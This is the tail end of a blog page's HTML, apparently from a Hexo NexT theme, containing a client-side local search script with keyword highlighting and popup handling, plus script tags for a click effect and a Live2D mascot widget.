                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  
  

  

  

  

  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>